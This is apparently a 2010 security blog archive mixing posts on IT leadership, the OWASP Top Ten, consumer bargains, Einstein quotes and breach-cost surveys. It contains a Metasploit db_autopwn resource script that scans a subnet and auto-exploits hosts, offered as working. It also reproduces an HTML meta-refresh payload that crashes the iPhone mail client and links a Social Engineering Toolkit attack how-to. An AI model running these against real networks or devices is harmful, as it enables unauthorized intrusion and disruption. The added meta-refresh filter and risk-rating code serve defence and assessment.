Archive for 2010
The art of technology
…and it is an art. This is from the perspective of a technology leader seeing the changes over the last ten or so years, and is in the same thought process as the CIO write up I posted last week.
There are more than a few non-technical hurdles we have to jump over. Consider these scenarios, for instance.
A C level executive wants to push a project through – you as the senior IT executive cannot sign off on the release until some sanity checks are done, but the C level releases anyway.
A senior executive refuses to implement controls because it will add complexity to the project – yet the controls are required by the industry.
These aren’t insurmountable issues but are just a couple of the hoops we have to jump through. The point here isn’t to have answers to the above issues, but to show that the art (see title) is not only being a leader in the technical field, a mentor to technical staff and all the other attributes of a senior IT executive, but also to deal with the personalities of those above you – managing your managers so to speak.
Should it be this way? No, not really but it’s not a perfect world we live in. If we can’t communicate at all levels we are in the wrong job. If we can’t make these people see reason all we can do is inform them of the risk. Since it’s our neck on the line when things go awry we need to make sure all bases are covered. Even if we are right we cannot afford to make any part of the business look bad so it becomes a strategic issue, but is that really where we want to go with this, or where we need to be? If we have tried all avenues and we are still not being heard – perhaps the business isn’t ready for a senior executive in the IT leadership role. That’s a hard truth and also a tough call.
We’ve seen the IT role move from being a customer organization to a business partner, and rightfully so. Look how long it took to do that. In the age of ever advancing technology does everyone realize that the business will not function without IT? That’s a rhetorical question but the excuse of not knowing what IT does isn’t going to cut it anymore. Should we explain the complexity of our environment to everyone, or should we be seen as the enabling business partner that drives the business forward from the proper use of technology?
This isn’t a rant by the way. It’s attempting to realize something that I have been working with for a long time. IT has value to the business and is a business partner. We know IT is not revenue generating but we should not be seen as a drain on assets, or a department that spends for the sake of spending. We have to trust that our IT executives know what they are doing, just as you would trust a CEO or COO that they know what they are doing, and accept that you cannot know all about everything that we do. (yes, I meant to write that sentence that way!). Superseding and second guessing our world is not going to help the business, in fact more often than not it will hurt the business.
As with everything there are many points of view pertaining to this topic. I’ve read many on the CIO forums and LinkedIn noticeboards, and I’ve heard many when speaking at conferences and attending seminars. But what I feel the most is, we as leaders can say the words “they don’t understand”. If that is where we leave it we don’t deserve to be leaders. We have to stand up and bridge the gap. For example, in the role of information security some say “the execs will get it when we get hacked, then we’ll get the money”. That’s a little too late for my liking. In that case I will take drastic measures to protect the business, that might include hacking the company myself. I would rather it be me that breaches the company than a hacker, and if done correctly it will have the desired effect. That will also add to your credence as a leader and more trust will start to flow. That being said there is a chance it could backfire. Not everyone can accept a direct approach like that.
I can go around in circles on this one, but I’ll leave it here for now. This isn’t meant as a blue print or guideline. It is meant to provoke thought and point of view and I fully understand that there are those that will push back hard – and that is good too. Care to share your thoughts? I’d love to hear them.
WPA is hackable?
I attended a track at Black Hat last week in which it was shown that WPA can be hacked by using WEP. I know, it sounds quite ‘out there’, but it’s true. The good thing is this can only be done if WPA migration mode is still enabled. So, if you’ve done a WPA migration recently, or even just to check to make sure, turn off WPA migration mode and you should be good to go.
Here’s a link to Core Labs’ presentation: WPA Migration Mode: WEP is back to haunt you…
OWASP Top Ten
From the OWASP website – I thought it was pertinent to post the OWASP top ten. We all know what they are but there is some great information wrapped in the description. For the full write up and a lot more useful information visit the OWASP website HERE.
The OWASP Top 10 Web Application Security Risks for 2010 are:
- Code Injection
- Cross-Site Scripting (XSS)
- Broken Authentication and Session Management
- Insecure Direct Object References
- Cross-Site Request Forgery (CSRF)
- Security Misconfiguration
- Insecure Cryptographic Storage
- Failure to Restrict URL Access
- Insufficient Transport Layer Protection
- Unvalidated Redirects and Forwards
The full descriptions are well worth reading, and further down the page there are “factors” broken out into four headings. Again, there is more information on the OWASP website, but look at the four headings below. This is a really easy way to help you classify the severity of potential threats, and to help you assess your assumption of risk.
Threat factors – skill level, motive, opportunity, size
Vulnerability factors – ease of discovery, ease of exploit, awareness, IDS
Technical impact factors – loss of confidentiality, integrity, availability, accountability
Business impact factors – financial damage, reputation, non-compliance, privacy violation
…worth sharing I thought!
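The four factor groups above are the inputs to OWASP’s risk rating method, so here is the calculation carried through in code. This is an added example, not from the OWASP site or this post: the 0-9 scoring, the LOW/MEDIUM/HIGH bands and the likelihood x impact matrix follow the OWASP Risk Rating Methodology, and the sample scores for the CSRF item are constructed.

```python
"""Risk rating from the four OWASP factor groups listed above.

Added example (not from the OWASP site or this post). The 0-9 scoring, the
LOW/MEDIUM/HIGH bands and the likelihood x impact matrix follow the OWASP Risk
Rating Methodology; the sample scores at the bottom are constructed.
"""

# Factor names as listed above ("IDS" is OWASP's intrusion-detection factor).
THREAT_FACTORS = ("skill_level", "motive", "opportunity", "size")
VULNERABILITY_FACTORS = ("ease_of_discovery", "ease_of_exploit",
                         "awareness", "intrusion_detection")
TECHNICAL_IMPACT_FACTORS = ("loss_of_confidentiality", "loss_of_integrity",
                            "loss_of_availability", "loss_of_accountability")
BUSINESS_IMPACT_FACTORS = ("financial_damage", "reputation_damage",
                           "non_compliance", "privacy_violation")

# Overall severity, indexed as SEVERITY[impact_band][likelihood_band].
SEVERITY = {
    "HIGH":   {"LOW": "MEDIUM", "MEDIUM": "HIGH",   "HIGH": "CRITICAL"},
    "MEDIUM": {"LOW": "LOW",    "MEDIUM": "MEDIUM", "HIGH": "HIGH"},
    "LOW":    {"LOW": "NOTE",   "MEDIUM": "LOW",    "HIGH": "MEDIUM"},
}
SEVERITY_ORDER = ("NOTE", "LOW", "MEDIUM", "HIGH", "CRITICAL")


def band(score):
    """Map a 0-9 average onto the three OWASP bands."""
    if score < 3:
        return "LOW"
    if score < 6:
        return "MEDIUM"
    return "HIGH"


def average(scores, factor_names):
    """Average the named factors, refusing missing or out-of-range scores."""
    values = []
    for name in factor_names:
        if name not in scores:
            raise KeyError(f"factor not scored: {name}")
        value = scores[name]
        if not 0 <= value <= 9:
            raise ValueError(f"{name} must be 0-9, got {value}")
        values.append(value)
    return sum(values) / len(values)


def rate_risk(threat, vulnerability, technical_impact, business_impact=None):
    """Combine the factor groups into likelihood, impact and overall severity.

    Likelihood is the average of all eight threat and vulnerability factors.
    Impact uses the business factors when the analyst could score them (OWASP's
    recommendation), otherwise the technical factors.
    """
    likelihood = (average(threat, THREAT_FACTORS)
                  + average(vulnerability, VULNERABILITY_FACTORS)) / 2
    if business_impact is not None:
        impact = average(business_impact, BUSINESS_IMPACT_FACTORS)
    else:
        impact = average(technical_impact, TECHNICAL_IMPACT_FACTORS)
    return {
        "likelihood": likelihood, "likelihood_band": band(likelihood),
        "impact": impact, "impact_band": band(impact),
        "severity": SEVERITY[band(impact)][band(likelihood)],
    }


def rank_risks(assessments):
    """Order {name: rating} from most to least severe, then by raw scores."""
    return sorted(assessments,
                  key=lambda n: (SEVERITY_ORDER.index(assessments[n]["severity"]),
                                 assessments[n]["likelihood"],
                                 assessments[n]["impact"]),
                  reverse=True)


# Constructed scores for the CSRF item above; these are not OWASP's numbers.
CSRF_THREAT = {"skill_level": 6, "motive": 4, "opportunity": 7, "size": 9}
CSRF_VULN = {"ease_of_discovery": 7, "ease_of_exploit": 5,
             "awareness": 6, "intrusion_detection": 8}
CSRF_TECH = {"loss_of_confidentiality": 6, "loss_of_integrity": 7,
             "loss_of_availability": 1, "loss_of_accountability": 9}
CSRF_BUSINESS = {"financial_damage": 1, "reputation_damage": 2,
                 "non_compliance": 2, "privacy_violation": 3}

if __name__ == "__main__":
    technical_only = rate_risk(CSRF_THREAT, CSRF_VULN, CSRF_TECH)
    with_business = rate_risk(CSRF_THREAT, CSRF_VULN, CSRF_TECH, CSRF_BUSINESS)
    print("technical impact only:", technical_only["severity"])  # HIGH
    print("with business impact: ", with_business["severity"])   # MEDIUM
```

The two runs show why OWASP prefers business-impact scores when they are available: the same likelihood lands in a different overall band once the business consequences are known.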
American Express Security – FAIL!
I came upon this from a twitter post – check it out! American Express have an insecure web form. They actually ask you to click on a link if you want a secure web form. Wow – talk about conflict of interest. Consider the stringent PCI requirements that Amex put corporations under, with some pretty expensive repercussions if you don’t comply, and they have an insecure web form. I’m flabbergasted!
See for yourself HERE!
8 Phony ‘Bargains’ and Better Alternatives
I saw this on Yahoo Finance, provided by CBSMoneywatch.com and written by Caroline E. Mayer, and thought it deserved a repost. It’s confusing enough to think about credit reports etc. Below are good guidelines to follow.
Big discounts! Big sales! Big freebies! Enticing deals abound, but you need to distinguish those from the raw deals masquerading as bargains. Many of them come with so many strings attached that they could cost you plenty. (Those frequent-flier rewards cards, for example? They often cost you a bundle — and the airline miles are often more restrictive and harder to use than what you’d get from a cash-back credit card.)
For consumers, a little homework goes a long way. Here are eight would-be deals to steer clear of, as well as our suggestions for better options.
1. Unlimited Long Distance
Many telephone plans bundle “free” unlimited long-distance service with local calling service. If you don’t make a lot of long-distance calls — or if you make a lot of them from your cell phone — these plans may not be cost effective. A bundled plan typically costs about $20 more than a local plan, but the average American consumer makes fewer than two hours of long-distance phone calls a month, according to the Federal Communications Commission. That’s about 17 cents per minute.
Better Deal: Skip the extra fees, and buy your long-distance service from a reseller such as ECG or Pioneer Telephone. These companies buy their long-distance service wholesale from the larger telecommunications firms but offer the same general quality for far lower prices, billing by the minute or fraction thereof. (ECG charges 2.5 cents a minute for interstate phone calls; Pioneer’s price is 2.7 cents.)
Alternately, sign up for a voice over Internet protocol (VoIP) plan from a carrier like Vonage, whose plans start at $15 a month (climbing to $26 after a six-month trial) for both local and long distance. Calls travel over the Internet, though, so you need a stable, active cable or DSL Internet connection for this to work.
2. Frequent-Flier Rewards Cards
Credit card rewards tied to airline miles or gift points were the earliest players in the sector, but it’s time to dump them. For one thing, the benefits have shrunk, particularly on airlines: They’ve increased the number of miles needed for a free flight; reduced flight schedules, making free seats harder to find; and, in some cases, imposed a booking fee on rewards flights.
On certain rewards cards, annual fees may also outweigh the benefits. The perks-laden American Express Platinum, which costs $450 a year, offers a complimentary airline ticket for every first- or business-class fare purchased on select international flights, plus a concierge service, free access to airport lounges, and other bonuses. It all sounds great, especially if you are booking lots of international business-class travel. But if not, you just paid $450 to have someone else make your restaurant reservations.
Better Deal: Try cash-reward cards instead. Airline miles and gifts are fine, but if you have the cash in your wallet, you can make your own purchasing decisions. Peter Flur of Credit Card Goodies, a 10-year-old Web site that monitors rewards cards, recommends Blue Cash from American Express, which offers up to 5 percent cash back on purchases at gas, groceries, and drugstores, as well as 1.25 percent on all other purchases once a cardholder rings up $6,500 in purchases any given year.
3. Checking Accounts That Pay Interest
Interest-bearing checking accounts at traditional brick-and-mortar banks often pay only 0.13 percent interest but require high minimums to avoid a monthly maintenance fee. On, for instance, a deposit of $3,400 — the average minimum required to avoid monthly fees, according to Bankrate.com data — that amounts to just $4.42 in annual interest.
Better Deal: In this low-interest environment, forget about getting any interest from your checking account, advises Richard Barrington, an analyst with MoneyRates.com. Instead, look for a no-fee checking account — and “be sure to check the minimum balance requirement,” Barrington says. “These minimums have been rising, so make sure it’s a minimum balance you can realistically maintain.”
Meanwhile, if you have extra cash, shop around for banks and credit unions that offer good deals. Mike Moebs, an economist whose firm surveys bank fees says there are a few banks and credit unions that combine checking and money-market deposit accounts into one, offering a high rate on balances over $2,500.
4. Overdraft Protection
Many banks used to offer it automatically when you opened an account, making it sound like a valuable safeguard. After all, if you bounced a check or tried to withdraw more cash from the ATM than you had in your account, you wouldn’t suffer any embarrassment when the bank refused to process a transaction.
But consumer advocates long argued that overdraft protection was just a way for banks to earn money at your expense, charging $20 to $35 per overdraft — a substantial penalty, considering the typical transaction prompting the overdraft fee is $20. That’s why the government has ordered new rules to take effect this summer that will require banks to get your approval before enrolling you in overdraft protection.
Better Deal: If you want back-up protection without the overdraft fees, consider setting up a savings account linked to your checking account so funds can be transferred in case of an overdraft. There may still be a fee to transfer funds between accounts, but it’s typically lower — only $10.
Meanwhile, keep a careful tab on your bank account balance: If you opt out of overdraft protection and then make an ATM or debit-card transaction that exceeds your balance, your transaction could be denied.
5. Extended-Warranty Protection
Don’t buy additional warranty coverage for electronics and major appliances. For one thing, some repairs are already covered by the standard manufacturer warranty. And Consumer Reports’ researchers have found that products seldom break within the extended-warranty window — and that when electronics and appliances do break, average repair costs are about as much as an extended warranty.
Better Deal: Check the fine print on your existing Visa, MasterCard or American Express. Many of these cards, particularly if they are platinum or gold, will extend the warranty for a year. “It’s one of the greatest freebies from credit card companies ever,” says Edgar Dworsky, a consumer lawyer and founder of the Consumer World Web site. The warranty protection varies, so review the policies on your existing cards before you make a purchase — then use the one offering the best warranty protection.
6. Going-Out-of-Business Sales
They don’t offer the bargains you’d expect — at least at the outset, when the promoted discounts are usually off the full retail price. That “30 percent off” sale may not be any better than the deals you could get before the liquidation process started. In some cases, you may actually be better off buying from a rival store that is trying to compete with the bankrupt retailer — and will be around to take care of any problems after the liquidating store is out of business.
Better Deal: Shopping robots, such as PriceGrabber.com and Shopping.com, are good places to comparison shop and may be particularly useful before visiting any liquidation sale, says Dworsky. One of his favorite sites, PriceSpider.com, posts historical prices; the range of prices should help you determine whether the price is likely to hold or continue to drop.
7. Paying for a Credit Report
Despite its name, FreeCreditReport.com is not gratis. Here’s what the fine print really says: Order your free report and you get a seven-day free trial membership in a credit-monitoring service. If you don’t cancel within seven days, you’ll be billed $14.95 a month until you bail out. Be wary of other sites making similar come-ons.
Better Deal: Visit AnnualCreditReport.com instead — the government-approved Web site where you can get a free credit report from each of the three major credit bureaus once a year. It won’t give you your actual credit score, but most people don’t need it. (The exception: If you’re actively shopping for a loan right now, go to myFICO.com to get your current score — and a report from Equifax or TransUnion — for $16.)
If you’re merely curious about how lenders perceive your credit record, you can get a good estimate of your credit score for free at CreditKarma.com. You can also try the credit score estimator at Credit.com; you will probably need your actual credit report to answer some of the site’s key questions, such as the age of your oldest credit account and the number of outstanding loans and credit cards.
8. Fraud Alerts
Don’t pay for identity-theft-protection services that automatically put fraud alerts on your credit report. You can do that yourself; it’s easy — and free. But be careful: Don’t put a fraud alert on your credit report as a general matter, because that means you can’t easily open new accounts. You should use fraud alerts only if you’ve had your wallet stolen or something else has happened to put you at real risk.
Better Deal: Review your monthly credit card and bank statements regularly to make sure there are no unauthorized charges. Also, don’t forget to obtain a copy of your free credit report annually from each of the three major credit bureaus — using AnnualCreditReport.com, of course.
10 Amazing Life Lessons You Can Learn From Albert Einstein
Albert Einstein has long been considered a genius by the masses. He was a theoretical physicist, philosopher, author, and is perhaps the most influential scientist to ever live.
Einstein made great contributions to the scientific world, including the theory of relativity, the founding of relativistic cosmology, the prediction of the deflection of light by gravity, the quantum theory of atomic motion in solids, the zero-point energy concept, and the quantum theory of a monatomic gas which predicted Bose–Einstein condensation, to name a few of his scientific contributions.
Einstein received the 1921 Nobel Prize in Physics “for his services to Theoretical Physics, and especially for his discovery of the law of the photoelectric effect.”
He published more than 300 scientific works and over 150 non-scientific works. Einstein is considered the father of modern physics and is probably the most successful scientist there ever was.
10 Amazing Lessons from Albert Einstein:
1. Follow Your Curiosity
“I have no special talent. I am only passionately curious.”
What piques your curiosity? I am curious as to what causes one person to succeed while another person fails; this is why I’ve spent years studying success. What are you most curious about? The pursuit of your curiosity is the secret to your success.
2. Perseverance is Priceless
“It's not that I'm so smart; it's just that I stay with problems longer.”
Through perseverance the turtle reached the ark. Are you willing to persevere until you get to your intended destination? They say the entire value of the postage stamp consists in its ability to stick to something until it gets there. Be like the postage stamp; finish the race that you’ve started!
3. Focus on the Present
“Any man who can drive safely while kissing a pretty girl is simply not giving the kiss the attention it deserves.”
My father always says you cannot ride two horses at the same time. I like to say, you can do anything, but not everything. Learn to be present where you are; give your all to whatever you’re currently doing.
Focused energy is power, and it’s the difference between success and failure.
4. The Imagination is Powerful
“Imagination is everything. It is the preview of life's coming attractions. Imagination is more important than knowledge.”
Are you using your imagination daily? Einstein said the imagination is more important than knowledge! Your imagination pre-plays your future. Einstein went on to say, “The true sign of intelligence is not knowledge, but imagination.” Are you exercising your “imagination muscles” daily? Don’t let something as powerful as your imagination lie dormant.
5. Make Mistakes
“A person who never made a mistake never tried anything new.”
Never be afraid of making a mistake. A mistake is not a failure. Mistakes can make you better, smarter and faster, if you utilize them properly. Discover the power of making mistakes. I’ve said this before, and I’ll say it again, if you want to succeed, triple the amount of mistakes that you make.
6. Live in the Moment
“I never think of the future - it comes soon enough.”
The only way to properly address your future is to be as present as possible “in the present.”
You cannot “presently” change yesterday or tomorrow, so it’s of supreme importance that you dedicate all of your efforts to “right now.” It’s the only time that matters, it’s the only time there is.
7. Create Value
“Strive not to be a success, but rather to be of value."
Don’t waste your time trying to be successful, spend your time creating value. If you’re valuable, then you will attract success.
Discover the talents and gifts that you possess, learn how to offer those talents and gifts in a way that most benefits others.
Labor to be valuable and success will chase you down.
8. Don’t Expect Different Results
“Insanity: doing the same thing over and over again and expecting different results.”
You can’t keep doing the same thing every day and expect different results. In other words, you can’t keep doing the same workout routine and expect to look different. In order for your life to change, you must change; the degree to which you change your actions and your thinking is the degree to which your life will change.
9. Knowledge Comes From Experience
“Information is not knowledge. The only source of knowledge is experience.”
Knowledge comes from experience. You can discuss a task, but discussion will only give you a philosophical understanding of it; you must experience the task first hand to “know it.” What’s the lesson? Get experience! Don’t spend your time hiding behind speculative information, go out there and do it, and you will have gained priceless knowledge.
10. Learn the Rules and Then Play Better
“You have to learn the rules of the game. And then you have to play better than anyone else.”
To put it all in simple terms, there are two things that you must do. The first thing you must do is to learn the rules of the game that you’re playing. It doesn’t sound exciting, but it’s vital. Secondly, you must commit to play the game better than anyone else. If you can do these two things, success will be yours!
Thank you for reading and be sure to pass this article along!
Social Engineer Toolkit – Website Attack How To
I found this while wandering about the web. Be careful – it works!
Social Engineering Toolkit – Website Attack How To
As with all things “hack” – be careful how you proceed. The opportunity to hack is always there – the ability to show restraint and remain ethical is a necessity! ‘Nuff said.
Enjoy.
A db_autopwn script run from msfconsole
Here’s a handy script I found on the web, written by HD Moore himself. It works like a charm!
$ vim ownitall.rc
# ownitall.rc – Metasploit resource script: build a host database from an nmap
# scan, then run db_autopwn against the hosts it finds
db_create /tmp/mynet.db
db_nmap -sS -F -n 192.168.0.0/24 -T5
setg AutoRunScript scraper
db_autopwn -t -e -p -r
$ msfconsole -r ownitall.rc
Have fun with it.
How to Reliably Crash the iPhone’s E-mail Client
From https://secure.grepular.com/ by Mike Cardwell
I have tested the following on two separate iPhones and it caused crashes on them both. I don’t have an iPhone of my own to test with, so I’m not able to investigate this much further.
1.) Create a blank file named anything.txt and then upload it to some webspace. It needs to be completely blank… 0 bytes. It must be served as text/plain. At least, “text/plain” is the only content type I know for sure it works with as I didn’t try any others.
2.) Send an HTML email to an email account that the iPhone can access. The HTML email must contain a meta refresh tag to the file which you have just created. Example:
<head>
<meta http-equiv="Refresh" content="1; URL=http://EXAMPLE/anything.txt"/>
</head>
3.) Open the email on an iPhone.
The iPhone email client actually honours the meta refresh and attempts to load the URL. It then proceeds to crash. Next time you open the email client it will have to re-sync all of the email.
This information comes with no warranty. Use it only for good, and only on your own phone.
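The defensive counterpart to the above: a filter a mail gateway or webmail front end could run over the HTML part of a message to drop the meta refresh tag that the iPhone client honours, while leaving every other tag and entity intact. This is an added example and not part of Mike Cardwell’s post; the sample message is constructed and reuses the http://EXAMPLE placeholder from the post.

```python
"""Strip <meta http-equiv="refresh"> from HTML e-mail before delivery.

Added example (not from the original post). Uses only the standard library so
it can sit in a mail filter without extra dependencies. The parser rewrites the
HTML tag by tag, dropping any meta refresh (any case, with or without a
self-closing slash) and recording what it removed for logging.
"""
from html import escape
from html.parser import HTMLParser


class MetaRefreshStripper(HTMLParser):
    """Re-emit the document verbatim except for meta refresh tags."""

    def __init__(self):
        # convert_charrefs=False so entities are passed through untouched
        super().__init__(convert_charrefs=False)
        self.out = []
        self.removed = []

    @staticmethod
    def _is_meta_refresh(tag, attrs):
        if tag != "meta":
            return False
        # HTMLParser lowercases attribute names; values keep their case
        return any(name == "http-equiv" and (value or "").strip().lower() == "refresh"
                   for name, value in attrs)

    def _emit_start(self, tag, attrs, self_closing):
        if self._is_meta_refresh(tag, attrs):
            self.removed.append(self.get_starttag_text())
            return
        parts = [tag]
        for name, value in attrs:
            parts.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + ("/>" if self_closing else ">"))

    def handle_starttag(self, tag, attrs):
        self._emit_start(tag, attrs, False)

    def handle_startendtag(self, tag, attrs):
        self._emit_start(tag, attrs, True)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def strip_meta_refresh(html_body):
    """Return (sanitised_html, list_of_removed_tag_texts)."""
    parser = MetaRefreshStripper()
    parser.feed(html_body)
    parser.close()
    return "".join(parser.out), parser.removed


# Constructed sample message carrying the tag from the post above.
SAMPLE_MAIL = (
    '<html><head><meta charset="utf-8">\n'
    '<meta http-equiv="Refresh" content="1; URL=http://EXAMPLE/anything.txt"/>\n'
    '</head><body><p>Hi &amp; bye</p></body></html>'
)

if __name__ == "__main__":
    clean, removed = strip_meta_refresh(SAMPLE_MAIL)
    for tag in removed:
        print("dropped:", tag)   # one tag dropped
    print(clean)
```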
CISOs Keep Breach Costs Lower
The latest “Cost of a Data Breach” survey from the Ponemon Institute finds companies with a CISO are better able to handle loss of sensitive information
By Joan Goodchild, Senior Editor
Companies continue to pay a high price to clean up the mess created by a data breach, but having a Chief Information Security Officer (CISO) may offer some protection. That is the conclusion of a study released Monday by the Ponemon Institute, a Michigan-based consultancy that conducts independent research on privacy, data protection and information security policy.
This is the fifth year Ponemon has conducted its “Cost of a Data Breach” survey, which examined actual data breach experiences of 45 U.S. companies from 15 different industry sectors. This year, the cost of a data breach has increased to $204 from last year’s $202 per customer record. However, companies that had a CISO (or equivalent title) who managed the data breach incident experienced an average per capita cost of $157 versus $236 for companies without such CISO leadership.
Approximately 40 percent of participating companies had a CISO in charge of managing the data breach incident, according to the survey.
“While other functional areas are typically involved in crisis management activities surrounding the data breach, our results suggest CISO leadership substantially reduces the overall cost of data breach,” the report states.
“The one big take away on positive takeaway is that in (companies) that have CISO involvement, breaches tend to cost less because they have a more strategic view of protecting data than the old idea of whack-a-mole, fix it a hundred different times,” explained Phillip Dunkelberger, president and CEO of PGP Corp., which co-sponsored the study. “CISO involvement at a higher level means less cost of a data breach and less chance of repeating it because of the strategic view of protecting it that these professionals take.”
While the cost of a breach only rose two dollars per record this year, Dr. Larry Ponemon, founder and chair of the Ponemon Institute, pointed out the massive increase in cost over the five years since the study’s inception, when breaches cost $138 per compromised customer record. In figuring out the costs, the study takes into account a wide range of business costs, including expense outlays for detection, escalation, notification, and after the fact (ex-post) response. The economic impact of lost or diminished customer trust and confidence, measured by customer churn or turnover rates, is also analyzed.
Other highlights from this year’s research include:
- Forty-two percent of all cases in this year’s study involved third-party mistakes or flubs. Data breaches involving outsourced data to third parties, especially when the third party is offshore, are most costly. The per capita cost for data breaches involving third parties is $217 versus $194, more than a $21 difference, according to Ponemon.
- Twenty-four percent of all cases in this year’s study involved a malicious or criminal attack that resulted in the loss or theft of personal information. Research shows data breaches involving malicious or criminal acts are much more expensive than incidents resulting from negligence. The per capita cost of a data breach involving a malicious or criminal act averages $215. The per capita cost of a data breach involving a negligent insider or a systems glitch averages $154 and $166, respectively.
- Thirty-six percent of all cases in this year’s study involved lost or stolen laptop computers or other mobile data-bearing devices. Data breaches concerning lost, missing or stolen laptop computers are more expensive than other incidents. Specifically, in this year’s study the per victim cost for a data breach involving a lost or stolen laptop is $225.
“It’s not just about bad guys, but also good guys who make mistakes,” noted Ponemon.
Companies on IT Security Spending: Where’s the ROI?
Companies have spent millions to bolster their IT security in recent years. But some are starting to wonder if it’s been worth it, according to the 2010 Cyber Security Watch survey CSO conducted with the U.S. Secret Service, Carnegie Mellon University CERT and Deloitte & Touche.
By Bill Brenner, Senior Editor, CSO Online
Companies have spent many millions of dollars to build defenses around their IT assets this past decade, motivated by malware attacks, data security breaches and the resulting regulatory compliance cattle prod.
But the bad guys are still a few steps ahead in terms of sophistication and speed and some wonder if their investments were all for nothing, according to the newly-released 2010 Cyber Security Watch Survey.
More than 500 respondents, including business and government executives, professionals and consultants, participated in the survey, conducted by CSO Magazine with help from the U.S. Secret Service, Carnegie Mellon Software Engineering Institute (CERT) and Deloitte’s Center for Security and Privacy Solutions. Though respondents point to sizable efforts to keep their companies secure, many admit it’s getting almost impossible to outpace the bad guys.
Also see Network Security: The Basics
“Security confidence seems to be waning. Respondents are spending more money and implementing new capabilities, but overall they seem to be unsure about how truly effective their efforts really are toward ensuring security,” said Ted DeZabala, principal at Deloitte & Touche LLP and U.S. leader of Deloitte’s Security & Privacy services.
The survey showed a drop in cybercrime victims — 60 percent this year compared to 66 percent in 2007. But the affected organizations have experienced significantly more attacks than in previous years, fueling doubts over a lack of return-on-investments (ROI).
Between August 2008 and July 2009 more than a third (37 percent) of respondents experienced an increase in cybercrimes compared to the previous year. While outsiders (non-employees or contractors) are the main culprits of cybercrime in general, the most costly or damaging attacks are more often caused by insiders (employees or contractors). One quarter of all cybercrime attacks were committed by an unknown source.
Although the number of incidents rose, the ramifications have not been as severe. Since 2007, when the last cybercrime survey was conducted, the average monetary value of losses resulting from cybercrimes declined by 10 percent. This can likely be attributed to an increase in both IT security spending (42 percent) and corporate/physical security spending (86 percent) over the past two years.
And yet, as technology advances, so do the attack methods, and many respondents worry that the bad guys are still winning. Outsiders invade organizations with viruses, worms or other malicious code; phishing; and spyware, while insiders most commonly expose private or sensitive information unintentionally, gain unauthorized access to/use of information systems or networks, and steal intellectual property.
The survey finds that insiders most often use their laptops or copy information to mobile devices as a means to commit electronic crimes against their organization. Respondents suggested data is often downloaded to home computers or sent outside the business via e-mail. This may lead to damaged reputations and may put organizations in violation of state or federal data protection laws.
More than half of the respondents — 58 percent — do believe they are more prepared to prevent, detect, respond to or recover from a cybercrime incident compared to the previous year. But only 56 percent have a plan for reporting and responding to an incident.
The research also indicated that businesses are trying to take steps to identify insider threats. Nearly one-third (32 percent) now monitor the online activities of employees who may be disgruntled or who have turned in their resignations.
Dawn Cappelli, technical manager for the Threat and Incident Management division of the Software Engineering Institute CERT Program, said insider attacks continue to be seen as a bigger problem than anything that might come from the outside.
“Attacks are more costly than outside attacks, and seven of the top eight practices that were indicated as being most effective at prevention, detection and deterrence apply to employees,” she said.
Though many respondents may be doubting the ROI of their security investments, the activity to deal with the insider threat at least indicates that no one is thinking about tightening up on their spending. Perhaps that’s because many feel like they have no choice but to keep spending, lest they fall even further behind the bad guys.
“This looks like good news — they have found effective practices for handling the most costly threats,” Cappelli said. “However, the technical solutions for insider threat mitigation were ranked alarmingly low: DLP, ranked 9th least effective, and change control/configuration management systems, ranked 5th least effective. In addition, account audits are only being performed by 43 percent of respondents, probably because of the technology gap.”
To that end, her parting advice is not to the respondents, but to the vendor community: Come up with something better to help customers achieve the DLP and change control/configuration management they need.
Your 5-Step Malware-Analysis Toolkit
From http://www.campustechnology.com By Lenny Zeltser
A large number of computer intrusions involve some form of malicious software (malware), which finds its way to the victim’s workstation or to a server. When investigating the incident, the IT responder typically seeks to answer questions such as: What actions can the malware specimen perform on the system? How does it spread? How, if at all, does it maintain contact with the attacker? These questions can all be answered by analyzing the offending malware in a controlled environment.
A simple analysis toolkit, built from free and readily available software, can help you and your IT team develop the skills critical to responding to today’s security incidents. The steps below will help get you started. We’ll focus on malware analysis in a Windows environment, since that platform is particularly popular among malware authors.
Step 1: Allocate physical or virtual systems for the analysis lab
A common approach to examining malicious software involves infecting a system with the malware specimen and then using the appropriate monitoring tools to observe how it behaves. This requires a laboratory system you can infect without affecting your production environment.
The most popular and flexible way to set up such a lab system involves virtualization software, which allows you to use a single physical computer for hosting multiple virtual systems, each running a potentially different operating system. Free virtualization software options include:
Running multiple virtual systems simultaneously on a single physical computer is useful for analyzing malware that seeks to interact with other systems, perhaps for leaking data, obtaining instructions from the attacker, or upgrading itself. Virtualization makes it easy to set up and use such systems without procuring numerous physical boxes.
Another useful feature of many virtualization tools is the ability to take instantaneous snapshots of the laboratory system. This way, you can record the state of the system before you infect it, and revert to the pristine environment with a click of a button at the end of your analysis.
If using virtualization software, install as much RAM into the physical system as you can, as the availability of memory is arguably the most important performance factor for virtualization tools. In addition, having a large hard drive will allow you to host many virtual machines, whose virtual file systems typically are stored as files on the physical system’s hard drive.
Because malware may detect that it’s running in a virtualized environment, some analysts prefer to rely on physical, rather than virtual, machines for implementing laboratory systems. Your old and unused PCs or servers can make excellent systems for your malware-analysis lab, which usually doesn’t need high-performing CPUs or highly redundant hardware components.
To allow malware to reach its full potential in the lab, laboratory systems typically are networked with each other. This helps you observe the malicious program’s network interactions. If using physical systems, you can connect them with each other using an inexpensive hub or a switch.
Step 2: Isolate laboratory systems from the production environment
You must take precautions to isolate the malware-analysis lab from the production network, to mitigate the risk that a malicious program will escape. You can separate the laboratory network from production using a firewall. Better yet, don’t connect laboratory and production networks at all, to avoid firewall configuration issues that might allow malware to bypass filtering restrictions.
If your laboratory network is strongly isolated, you can use removable media to bring tools and malware into the lab. It’s best to use write-once media, such as CDs, to prevent malicious software from escaping the lab’s confines by writing itself to a USB key. If using a USB key, which is more convenient than a CD, get a model that includes a physical write-protect switch.
Some malware-analysis scenarios benefit from the lab being connected to the internet. Avoid using the production network for such connectivity. If possible, provision a separate, and usually inexpensive, internet connection, perhaps by dedicating a DSL line to this purpose. Avoid keeping the lab connected to the internet all the time to minimize the chance of malware in your lab attacking someone else’s system on the internet.
If virtualizing your lab, be sure to keep up with security patches released by the virtualization-software vendor. Such software may have vulnerabilities that could allow malware to escape from the virtual system you infected and onto the physical host. Furthermore, don’t use the physical machine that’s hosting your virtualized lab for any other purpose.
Step 3: Install behavioral analysis tools
